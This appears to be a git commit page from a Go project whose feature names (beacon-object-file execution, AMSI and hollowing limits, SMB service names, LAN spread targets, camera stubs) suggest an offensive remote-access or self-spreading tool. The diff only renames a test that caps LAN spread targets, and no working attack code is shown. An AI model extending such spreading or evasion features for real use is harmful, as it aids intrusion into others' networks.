Add by-design safety tests and clear PROBLEMS.md rows.
Go/Vitest coverage for bof_execute, hollow AMSI limits, cloudflared stub policy, KEV n/a, mesh P2P zero peers, and non-Windows GPU/camera stubs. Skip GPU subprocess on non-Windows; document cloudflared external connector path.
This commit is contained in:
@@ -40,7 +40,7 @@ func TestSMBUNCSvcName(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestDiscoverLANSpreadTargetsRespectsCap(t *testing.T) {
|
||||
func TestDiscoverLANSpreadTargetsRespectsCustomCap(t *testing.T) {
|
||||
targets := DiscoverLANSpreadTargets(2)
|
||||
if len(targets) > 2 {
|
||||
t.Fatalf("cap ignored: got %d targets", len(targets))
|
||||
|
||||
Reference in New Issue
Block a user